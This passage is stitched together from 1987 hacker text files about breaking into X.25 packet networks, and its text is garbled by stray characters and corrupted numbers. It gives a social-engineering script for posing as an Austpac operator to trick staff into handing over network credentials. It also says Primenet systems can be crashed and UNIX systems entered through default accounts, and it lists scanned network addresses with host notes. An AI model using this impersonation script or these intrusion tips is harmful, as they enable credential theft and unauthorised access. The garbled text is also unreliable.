into Primo-9׍s. You will have to spend a lot of time finding the right spot, but every primenet I came across was crashable. I don't usually give this out, but concentrate on the captive communication module. - UNIX's have got so many holes in them that it's really not funny, but to make use of them, one needs to get inside first and there are dozens of defaults to choose from. More about that later. 3> SOCIAL ENGINEERING. Ye.Ԭcs, my favourite one. The term has originated in the USA and means BULLSHITING PEOPLE to get them to hand over their passwords quite willingly. If one is to attempt this art, one needs the tools. These are mainly an ADULT voice, since a teenager will get nowhere, and the ability to plan out the conversation and anticipate every responce. Let me give you a few examples: You all know that AUSTPAC NUI's a hard to get, so why not have some dumb secreta/$Cry give one to you. Firs of all find a victim. The Melbourne University Library is a good one. Next get a few facts together. Ask yourself a few questions. Who am I? 'An Assistant Austpac Operator' Pick a real name from the phone book, jot down the number, address and have it ready if needed. Why Should the Victim give you his Accounts? 'Basically, because there has been a stuff up with Austpac and the last six digits have been lost and you need themֻTWICS BEELINE VAX 44013612225 UNIX 44013612272 44013612277 ULTRIX 44013612599 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= T E L E P A K 2405000xxx Sprint by an unknown hacker =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 2405000004 RAM 2405000005 RAM 2405000007 NETVAL - Version 2.02 2405000010 2405000012 2405000013 BAD XRAY 2405000014 BAD XRAY 2405000015 2405000016 ELF VERSION 4.0 Valid commands are:Ὤ COPy CReate Node CReate Slot CReate Partial DEVice DIrectory DUmp Node DUmp Slot DUmp Partial Gateway Help LOAd Node LOAd Slot LOAd Partial LOCate MESsage Quit REStart The following |'Jcommands apply to DISK only: CONdense DELete Format REName The following commands apply to TAPE only: SKip REWind 2405000018 2405000020 2405000021 2405000025 2405000030 2405000031 2405000032 2405000033 2405000034 2405000035 2405000042 2405000044 2405000046 2405000050 2405000051 2405000053 2405000055 2405000057 inter-link established from DATAPAK to TYMNET 2405000087 >>> 7 DATAPAK <<< 2405000089 2405000091 2405000099 2405000101 2405000103 2405000105 2405000107 2405000111 2405000113 2405000114 2405000116 2405000119 2405000121 2405000122 2405000123 2405000124 2405000131 2405000133 2405000135 2405000137 2405000162 2405000165 2405000169 Computer Resource Services AB 2405000171 TSL Data AB, DECSYSTEM 2020 #1 2405000173 2405000202 (: PROMPT) 2405000236 not a valid user on this system 2405000237 not a valid user on this system 2405000239 not a valid user on0Hx this system 2405000243 host 2405000254 2405000258 SKF GROUP TELENEt 2405000260 ANGE L\SEN 2405000264 2405000267 2405000269 2405000278 2405000279 not a valid user on this system 2405000280 not a valid user on this system 2405000281 not a valid user on this system 2405000282 not a valid user on this system 2405000288 not a valid user on this system 2405000289 not a valid user on this system 2405000290 not a valid user on this system 2405000291 not a valid user on this system 240500029Ş2 not a valid user on this system 2405000293 not a valid user on this system 2405000294 not a valid user on this system 2405000411 T R A N S P A C 208075000xxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the depths of - THE REALM - 05/04/1987 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 208075000039 host 208075000059 CICS 2080750 ?>800062 VOTRE DEMANDE 208075000120 A U S T P A C N U A S. 18/04/1987 ------------------------ The following is a listing of NUA's I came across just recently on Austpac and most of them do not appear on any other listings. At the time I didn't have a NUI, so a lot of them are not identified. 222135000 222135001 222330000 222330002 222330003 222330010 222330014 222334000 222334002 222334003 222334004 222334005 222334006 222334007 222335000 222335005 222335006!C 222335007 222430000 PRIMENET 19.4_8B SYDN51 222430001 VAX 222430003 X.29 HOST GATEWAY 222430004 "austpac drops the line????" 222430006 222430008 222430009 CAPITAL MARKETS VCON4 MV/10000 222430010 EQUITY'S MV/10000 VCON2 222430011 222430012 222430013 222434002 C&C/EPL VAX CLUSTER 222434005 222434006 222434007 222435000 222630000 222630002 222630005 222630006 222630009 222630010 222634000 222634003 222634010 222634011 222634012 222634014 X.29 GATEWAY SECURITY CHECK 22"U,x2634015 222930000 222930001 222930002 X.29 HOST GATEWAY 222930004 222930005 222930006 222930011 222930012 PRIMENET 19.4.10q SYD 222930014 222930015 222935000 224121006 224223000 224223002 224323000 224422000 224422006 224423000 224822000 224922000 224922004 226022001 226035000 226334002 226334003 226335000 API VIDEOTEXT 226335003 226335004 226335005 226335007 226335009 226435000 226435002 226435003 226935000 MAYNET 226935004 227334000 227335000 227434000 227934000 227934001 #1W|227934002 228022000 228121000 228121002 228123000 228621000 228621001 VAX PING EPPTSA When you get a RNA error, it means you need a NUI to access the system. If accessing via another PAD just use the proper format as explained earlier. I'm working on a complete list of a Austpac NUA's along with MIDAS ones, but that will take some time. Catch Ya Later ----====} THE FORCE {====---- L O C A T I N G P T S N N U M B E R S -----------------------$ʔbC-------------------- If you ever have a need to locate an online system belonging to a particular company, it can be a very tall order to fill. However there are few things you can do which will help, although success is not guaranteed. 1> When a Company sets up a data line, It must be registered by telecom to be legal. (Isn't it great to have a friends working there ey?) All data lines are classed a FAX lines, and unless telecom has been specifically instructed n